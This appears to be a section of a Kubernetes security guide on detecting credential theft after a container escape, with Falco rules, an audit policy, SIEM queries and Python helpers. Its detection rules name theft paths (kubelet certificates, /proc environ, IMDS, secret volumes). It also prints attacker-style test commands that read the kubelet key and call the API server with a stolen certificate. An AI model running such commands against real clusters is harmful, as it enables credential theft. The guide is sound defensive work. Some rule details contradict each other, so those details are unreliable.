Falco instruments the kernel via eBPF probes and matches syscall events against rules, which lets it detect the specific syscall patterns that characterise each phase of the post-escape chain:

# /etc/falco/rules.d/post-escape-detection.yaml

- rule: Kubelet PKI read by non-kubelet process
  desc: >
    A process other than kubelet is reading kubelet TLS credentials.
    The kubelet PKI directory should only be accessed by the kubelet process itself.
    Any other reader — including shell scripts, curl, or cp — indicates credential theft
    following a container escape.
  condition: >
    open_read and
    fd.name startswith "/var/lib/kubelet/pki" and
    not proc.name in (kubelet, kubeadm, kube-apiserver)
  output: >
    Kubelet PKI accessed by unexpected process
    (proc=%proc.name pid=%proc.pid user=%user.name
    file=%fd.name cmdline=%proc.cmdline parent=%proc.pname)
  priority: CRITICAL
  tags: [container-escape, credential-theft, kubernetes, kubelet]

- rule: Cross-process environ read
  desc: >
    A process is reading the environment variables of another process via /proc/<pid>/environ.
    This is the primary mechanism for harvesting secrets injected as environment variables
    into co-located containers after a node compromise. Host processes are in scope because
    the post-escape attacker runs on the host; extend the exclusion list for local agents.
  condition: >
    open_read and
    fd.name glob "/proc/*/environ" and
    not proc.name in (ps, top, htop, glances, systemd, auditd, falco, containerd, dockerd)
  output: >
    Cross-process environ read, possible credential harvesting
    (proc=%proc.name pid=%proc.pid user=%user.name
    target=%fd.name cmdline=%proc.cmdline)
  priority: ERROR
  tags: [container-escape, credential-theft, proc-filesystem]

- rule: IMDS access from container process
  desc: >
    A process inside a container is directly accessing the cloud instance metadata service.
    With IMDSv2 and hop limit 1, this should fail, but the attempt itself is anomalous
    and indicates reconnaissance following a partial escape or misconfiguration.
  condition: >
    (evt.type = connect or evt.type = sendto) and
    container and
    (fd.sip = "169.254.169.254" or fd.sip = "fd00:ec2::254")
  output: >
    IMDS access from container — possible cloud credential theft attempt
    (container=%container.name image=%container.image.repository
    pid=%proc.pid user=%user.name cmdline=%proc.cmdline)
  priority: ERROR
  tags: [container-escape, imds, cloud-credentials]

- rule: kubectl used with kubelet certificate
  desc: >
    kubectl is being invoked with explicit client certificate flags pointing to the
    kubelet PKI directory. This is the exact invocation pattern used to enumerate
    the cluster using a stolen kubelet identity.
  condition: >
    spawned_process and
    proc.name = kubectl and
    (proc.args contains "kubelet-client" or
     proc.args contains "/var/lib/kubelet/pki")
  output: >
    kubectl invoked with kubelet certificates
    (pid=%proc.pid user=%user.name cmdline=%proc.cmdline
    parent=%proc.pname pparent=%proc.aname[2])
  priority: CRITICAL
  tags: [container-escape, credential-theft, kubernetes, lateral-movement]

- rule: Kubelet pod secret volume traversal
  desc: >
    A process is traversing /var/lib/kubelet/pods looking for token files.
    This path contains the mounted secrets and service account tokens for all
    pods on the node, and should only be accessed by the kubelet and container runtime.
  condition: >
    open_read and
    (fd.name glob "/var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*" or
     fd.name glob "/var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/*") and
    not proc.name in (kubelet, containerd, containerd-shim, dockerd, runc)
  output: >
    Kubelet pod secret volume accessed by unexpected process
    (proc=%proc.name pid=%proc.pid user=%user.name
    file=%fd.name cmdline=%proc.cmdline)
  priority: CRITICAL
  tags: [container-escape, credential-theft, kubernetes, service-account-token]

Deploy and validate:

# Copy rules into place and validate
cp post-escape-detection.yaml /etc/falco/rules.d/
falco --validate /etc/falco/rules.d/post-escape-detection.yaml

# Reload without a full restart (Falco reloads its configuration and rules on SIGHUP)
kill -HUP $(pgrep -x falco)

# Test the PKI rule fires correctly
# (from a test environment, not production)
sudo cat /var/lib/kubelet/pki/kubelet-client-current.pem > /dev/null
# Should trigger: "Kubelet PKI accessed by unexpected process (proc=cat ...)"

6. API Server Audit Policy for Node Identity Abuse

The Kubernetes audit log can capture every API server request. Configure the audit policy to record node identity activity in enough detail to detect access outside its normal operating pattern:

# /etc/kubernetes/audit-policy.yaml: add these rules
# These generate audit events for anomalous node identity API calls
# Audit policy user matching is exact (no wildcards), so match the system:nodes group

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log all secret access by node identities at the Request level
  # Normal kubelet secret access is via the Node Authorizer for bound secrets only
  # Any secret access by a node identity deserves a log entry
  - level: Request
    userGroups: ["system:nodes"]
    resources:
      - group: ""
        resources: ["secrets"]
    verbs: ["get", "list", "watch"]

  # Log auth can-i calls: attackers enumerate permissions after credential theft
  # kubectl auth can-i creates SelfSubjectAccessReview / SelfSubjectRulesReview objects
  - level: Request
    userGroups: ["system:nodes"]
    resources:
      - group: "authorization.k8s.io"
        resources: ["selfsubjectaccessreviews", "selfsubjectrulesreviews"]

  # Log all write calls made using a node identity
  # Kubelets routinely patch node and pod status, renew leases, and create events,
  # so expect volume here; writes to any other resource are unusual
  - level: RequestResponse
    userGroups: ["system:nodes"]
    verbs: ["create", "update", "patch", "delete", "deletecollection"]

In your SIEM, alert on:

# Splunk query — node identity listing secrets across multiple namespaces
index=k8s_audit
  user.username="system:node:*"
  verb IN ("list", "get")
  objectRef.resource="secrets"
| stats dc(objectRef.namespace) as namespaces by user.username, sourceIPs{}
| where namespaces > 1

A legitimate kubelet reads secrets only in the namespaces of pods scheduled to its node, so the threshold in the query above is a starting point: baseline it against the number of namespaces each node normally serves. A node identity that reads secrets in a namespace with no pods on that node is anomalous. A node identity that calls auth can-i --list is almost certainly an attacker, because the kubelet never needs to enumerate its own permissions.
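
Outside a SIEM, the same comparison can be run directly over the audit log. The sketch below assumes JSON-lines audit output with the standard user.username and objectRef fields; the function names and the expected mapping (node identity to the namespaces of pods scheduled on it) are illustrative assumptions that you would populate from your own scheduling data.

```python
import json
from collections import defaultdict


def secret_namespaces_by_node(audit_lines) -> dict:
    """Map each node identity to the namespaces in which it touched secrets."""
    seen = defaultdict(set)
    for line in audit_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        user = event.get("user", {}).get("username", "")
        ref = event.get("objectRef") or {}
        if user.startswith("system:node:") and ref.get("resource") == "secrets":
            seen[user].add(ref.get("namespace", ""))
    return dict(seen)


def unexpected_namespaces(seen: dict, expected: dict) -> dict:
    """Return, per node identity, namespaces read that are not in expected."""
    result = {}
    for user, namespaces in seen.items():
        extra = namespaces - expected.get(user, set())
        if extra:
            result[user] = extra
    return result
```

Any non-empty result from unexpected_namespaces is worth investigating, since the Node authorizer should already have denied those reads on a correctly configured cluster.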

Expected Behaviour

Falco alert on kubelet PKI access. When the post-escape attacker runs cat /var/lib/kubelet/pki/kubelet-client-current.pem, Falco generates within milliseconds:

09:47:32.441083234: Critical Kubelet PKI accessed by unexpected process
(proc=bash pid=38471 user=root
file=/var/lib/kubelet/pki/kubelet-client-current.pem
cmdline=cat /var/lib/kubelet/pki/kubelet-client-current.pem
parent=sh)

This event should page on-call immediately. There is no legitimate administrative reason for a non-kubelet process to read these files — the kubelet reads its own credentials at startup, and kubeadm reads them only during cluster bootstrap operations. Any other reader is anomalous.

IMDS block with hop limit 1. A container process attempting to obtain an IMDSv2 session token receives:

$ curl -s -X PUT "http://169.254.169.254/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
# No output: the request hangs until curl times out (add --max-time to fail fast)
# The token response leaves IMDS with an IP hop limit (TTL) of 1
# and is dropped at the extra hop (host net ns -> container net ns)
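The same check can be scripted so it runs as a recurring verification from inside a pod. This is a minimal sketch using only the Python standard library; the function name and the two-second timeout are assumptions, and the probe treats any error or timeout as "blocked" rather than distinguishing the cause.

```python
import urllib.request

IMDS_TOKEN_URL = "http://169.254.169.254/latest/api/token"


def imds_token_reachable(url=IMDS_TOKEN_URL, timeout=2.0):
    """Return True only if an IMDSv2 session token could be fetched from url."""
    request = urllib.request.Request(
        url,
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": "60"},
    )
    # Bypass any configured HTTP proxy: IMDS is link-local and must be
    # contacted directly for the result to mean anything.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    try:
        with opener.open(request, timeout=timeout) as response:
            return response.status == 200 and bool(response.read())
    except OSError:
        # Covers timeouts, refused connections, and HTTP error responses.
        return False
```

Calling imds_token_reachable() from a pod on the cluster network should return False once the hop limit is 1. A True result from a pod that does not use host networking suggests the instance metadata options have not been applied to that node.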

Correctly restricted node identity. With NodeRestriction enabled and a correctly configured cluster, kubectl auth can-i --list as the node identity returns:

Resources                     Non-Resource URLs   Resource Names                 Verbs
nodes                         []                  [ip-10-0-1-142.eu-west-1...]   [get patch update]
pods/status                   []                  []                             [update patch]

It does not show secrets [] [] [get] with a wildcard — secrets access should be scoped to specific named resources, and an attacker trying to kubectl get secret arbitrary-secret-name -n other-namespace receives Error from server (Forbidden).

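Certificate rotation reducing credential window. With 24-hour certificate validity, the stolen kubelet-client-current.pem stops working at most 24 hours after it was issued. Kubernetes does not check client certificates for revocation, so rotation alone does not invalidate the stolen copy; the API server rejects it only once its notAfter time has passed: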

curl --cert /tmp/stolen-kubelet.pem \
     --key /tmp/stolen-kubelet.pem \
     --cacert /etc/kubernetes/pki/ca.crt \
     https://APISERVER:6443/api/v1/nodes
# {"kind":"Status","status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
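The effect of the validity period on the attacker's window is simple arithmetic, sketched below under the assumption that the API server accepts a client certificate until its notAfter time regardless of whether the kubelet has since renewed. The timestamps and the function name are illustrative.

```python
from datetime import datetime, timedelta, timezone


def usable_window(not_after, stolen_at):
    """Time a stolen client certificate remains usable after the theft."""
    return max(not_after - stolen_at, timedelta(0))


# Hypothetical timeline: certificate issued at 08:00, stolen at 09:00 UTC.
issued = datetime(2024, 1, 1, 8, 0, tzinfo=timezone.utc)
stolen = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc)

for label, validity in [
    ("24 hours", timedelta(hours=24)),
    ("7 days", timedelta(days=7)),
    ("1 year", timedelta(days=365)),
]:
    print(f"{label:>8} validity -> usable for {usable_window(issued + validity, stolen)}")
```

The window depends on when in the certificate's lifetime the theft happens, so the validity period is an upper bound on exposure rather than a typical value.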

Trade-offs

IMDSv2 hop limit 1 breaks any workload that legitimately needs IMDS access from within a container, such as legacy applications that use the EC2 metadata service for configuration discovery rather than environment variables. The transition to hop limit 1 requires auditing all workloads for IMDS usage and migrating them to pod-level IAM (IRSA on EKS, Workload Identity on GKE) before enforcing the restriction. Applications using the AWS SDK v2 handle IMDSv2 transparently; applications using older SDKs or raw HTTP calls to IMDS may need code changes.

Falco /proc/*/environ rule generates false positives from legitimate observability tools. Datadog, New Relic, and Dynatrace agents enumerate /proc/<pid>/environ to discover process-level metadata and tags. The rule’s condition includes not container.id = host, which means host-side agents are excluded — but containerised agent sidecars or DaemonSet-based agents may still trigger it. Tune with not proc.name in (datadog-agent, newrelic-infra, dynatrace-oneagent, ...) based on your observability stack. Start the rule at WARNING priority, baseline for a week, then promote to CRITICAL with a tuned allowlist.
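The baselining week produces the data needed to build the allowlist. A minimal sketch of that step follows, assuming Falco is configured with JSON output and that the rule's output string includes proc.name so the field appears under output_fields; the rule name used here is a hypothetical placeholder for whatever the rule is called in your ruleset.

```python
import json
from collections import Counter


def baseline_process_names(falco_lines, rule_name):
    """Count alerts for rule_name per process name, most frequent first."""
    counts = Counter()
    for line in falco_lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON lines such as startup messages
        if event.get("rule") != rule_name:
            continue
        fields = event.get("output_fields") or {}
        counts[fields.get("proc.name", "<unknown>")] += 1
    return counts.most_common()


RULE = "Read process environ"  # hypothetical rule name

# Illustrative alert lines, not real Falco output.
SAMPLE_ALERTS = [
    json.dumps({"rule": RULE, "output_fields": {"proc.name": "datadog-agent"}}),
    json.dumps({"rule": RULE, "output_fields": {"proc.name": "datadog-agent"}}),
    json.dumps({"rule": RULE, "output_fields": {"proc.name": "datadog-agent"}}),
    json.dumps({"rule": RULE, "output_fields": {"proc.name": "cat"}}),
    json.dumps({"rule": "Some other rule", "output_fields": {"proc.name": "bash"}}),
    "Falco initialized",
]

for name, count in baseline_process_names(SAMPLE_ALERTS, RULE):
    print(name, count)
```

High-volume names that map to known agents are allowlist candidates. Low-volume names such as cat or bash are exactly what the rule exists to catch and should not be allowlisted just to reduce noise.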

24-hour certificate validity requires the CSR approval infrastructure to be working continuously. If the kube-controller-manager’s certificate signer is unavailable for more than the certificate validity period, kubelet certificates expire and nodes stop functioning. This is a real operational risk: during a control plane incident, automatic certificate renewal may fail, and with 24-hour certs, nodes begin failing faster than with 1-year certs. Monitor CSR approval latency and alert if CSRs remain pending for more than 15 minutes. Consider 7-day validity as a middle ground that meaningfully reduces the credential theft window without creating operational fragility.
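The CSR latency check can be sketched as a small function over the items returned by kubectl get csr -o json. This is an illustrative sketch, not a production monitor: the function name is an assumption, and it treats a CSR as stuck when it has no issued certificate, has not been denied or failed, and is older than the 15-minute threshold mentioned above. That covers both CSRs awaiting approval and CSRs that were approved but never signed.

```python
from datetime import datetime, timedelta, timezone


def stuck_csrs(csr_items, now, max_pending=timedelta(minutes=15)):
    """Return names of CSRs with no certificate issued after max_pending."""
    stuck = []
    for item in csr_items:
        status = item.get("status") or {}
        if status.get("certificate"):
            continue  # already signed
        conditions = status.get("conditions") or []
        if any(c.get("type") in ("Denied", "Failed") for c in conditions):
            continue  # terminal state, will never be signed
        created = datetime.strptime(
            item["metadata"]["creationTimestamp"], "%Y-%m-%dT%H:%M:%SZ"
        ).replace(tzinfo=timezone.utc)
        if now - created > max_pending:
            stuck.append(item["metadata"]["name"])
    return stuck


def _csr(name, created, status):
    # Hypothetical helper that builds a minimal CSR object for the sample data.
    return {"metadata": {"name": name, "creationTimestamp": created}, "status": status}


NOW = datetime(2024, 1, 1, 10, 0, tzinfo=timezone.utc)
SAMPLE_CSRS = [
    _csr("csr-old-pending", "2024-01-01T09:30:00Z", {}),
    _csr("csr-approved-unsigned", "2024-01-01T09:00:00Z",
         {"conditions": [{"type": "Approved"}]}),
    _csr("csr-issued", "2024-01-01T09:00:00Z",
         {"conditions": [{"type": "Approved"}], "certificate": "LS0t"}),
    _csr("csr-denied", "2024-01-01T09:00:00Z", {"conditions": [{"type": "Denied"}]}),
    _csr("csr-fresh", "2024-01-01T09:55:00Z", {}),
]

print(stuck_csrs(SAMPLE_CSRS, NOW))
```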

Kubelet pod secret volume Falco rule will fire on container runtime operations. During normal pod startup, containerd-shim and runc access /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/ to mount the secret into the container’s filesystem. The allowlist not proc.name in (kubelet, containerd, containerd-shim, dockerd, runc) covers the standard container runtimes. If you use cri-o or another runtime, add its process name to the allowlist or the rule fires on every pod start.

Failure Modes

Assuming NodeRestriction prevents all node identity abuse. The Node authorizer and the NodeRestriction admission plugin limit some access patterns but do not eliminate the node identity as an attack vector. The node identity can still read every secret referenced by pods on its node through the normal API path. In a cluster with 50 pods per node across 20 namespaces, the node identity has access to a significant fraction of production secrets by design. These controls prevent the node identity from reading secrets bound to other nodes or modifying arbitrary cluster resources, but the local node’s secrets are fully accessible. Do not treat NodeRestriction as equivalent to eliminating the node identity’s blast radius.

Not blocking IMDS at the network level. Relying solely on IMDSv2 configuration at the application layer does not protect against a node-level escape. IMDSv2 hop limit controls restrict container-level IMDS access, but once the attacker has escaped to the node, they have host-level network access and can call IMDS directly with a one-hop request. The protection that matters post-escape is the IAM role’s permission scope, not the IMDS configuration. Audit node IAM roles for excessive permissions — a node role that can assume other IAM roles, access production S3 buckets, or manage cluster authentication (like writing to the aws-auth ConfigMap via SSM Parameter Store) turns a node compromise into a full account compromise.

No audit logging for node identity API calls. The Kubernetes audit log is disabled or set to None level for node identity requests in many default cluster configurations, because node identities make high-volume routine API calls (watch pods, watch configmaps). When the audit policy excludes node identity API calls for performance reasons, the entire Phase 3 of the attack chain — cluster enumeration via the node identity — generates no audit events. The secret reads from the API server happen in silence. Configure the audit policy to log node identity requests for sensitive resource types (secrets, tokens) at Request level, even if routine watch calls are excluded.
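The silent-enumeration failure can be reproduced with a simplified model of audit rule evaluation. The sketch below assumes only the documented first-match-wins behaviour and models just four rule fields (users, userGroups, verbs, and a flat resources list); real policies also match on API groups, namespaces, and non-resource URLs, and the policies shown are hypothetical.

```python
def audit_level(rules, username, groups, verb, resource):
    """Return the level of the first rule that matches, or "None" if none do.

    An empty or missing field in a rule matches everything.
    """
    for rule in rules:
        if rule.get("users") and username not in rule["users"]:
            continue
        if rule.get("userGroups") and not set(groups) & set(rule["userGroups"]):
            continue
        if rule.get("verbs") and verb not in rule["verbs"]:
            continue
        if rule.get("resources") and resource not in rule["resources"]:
            continue
        return rule["level"]
    return "None"


# A policy that silences all node traffic for performance reasons.
QUIET_POLICY = [
    {"level": "None", "userGroups": ["system:nodes"]},
    {"level": "Metadata"},
]

# The same policy with a secrets rule placed ahead of the blanket exclusion.
FIXED_POLICY = [
    {"level": "Request", "userGroups": ["system:nodes"],
     "resources": ["secrets"], "verbs": ["get", "list", "watch"]},
] + QUIET_POLICY

node = ("system:node:node-a", ["system:nodes", "system:authenticated"])

print(audit_level(QUIET_POLICY, *node, "get", "secrets"))
print(audit_level(FIXED_POLICY, *node, "get", "secrets"))
print(audit_level(FIXED_POLICY, *node, "watch", "pods"))
```

Placing the secrets rule first keeps routine watch traffic excluded while restoring visibility into the reads that matter; reversing the order would leave the secrets rule unreachable.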

Treating the initial container escape as the only security boundary. The container boundary is one of multiple security boundaries in a Kubernetes cluster. When defenders focus exclusively on preventing container escapes — via seccomp profiles, AppArmor, read-only root filesystems, and dropped capabilities — while leaving the post-escape chain undefended, a single exploit bypasses all controls. The Falco rules and audit log configuration described here provide detection at each phase of the post-escape chain, independent of the escape mechanism. A container escape that triggers no Falco alerts and generates no anomalous audit log entries can remain undetected for weeks. The detection controls at the node level are not redundant with the prevention controls at the container level — they address the failure mode where prevention fails.

Assuming kubelet certificate rotation eliminates the credential theft risk. Certificate rotation reduces the window of credential usability, but does not eliminate it. The attacker who reads kubelet-client-current.pem at 9:00 AM has until that certificate expires (which may be 23 hours away) to use the credential, whether or not the kubelet renews in the meantime. During that window, they can enumerate the cluster, read secrets, and create persistent backdoors using other credentials found on the node, such as service account tokens from pod volumes, which have their own expiry and are not affected by kubelet certificate rotation. The 24-hour certificate window is meaningful for reducing the reusability of the kubelet cert specifically, but persistent access obtained using cluster-admin service account tokens is not affected.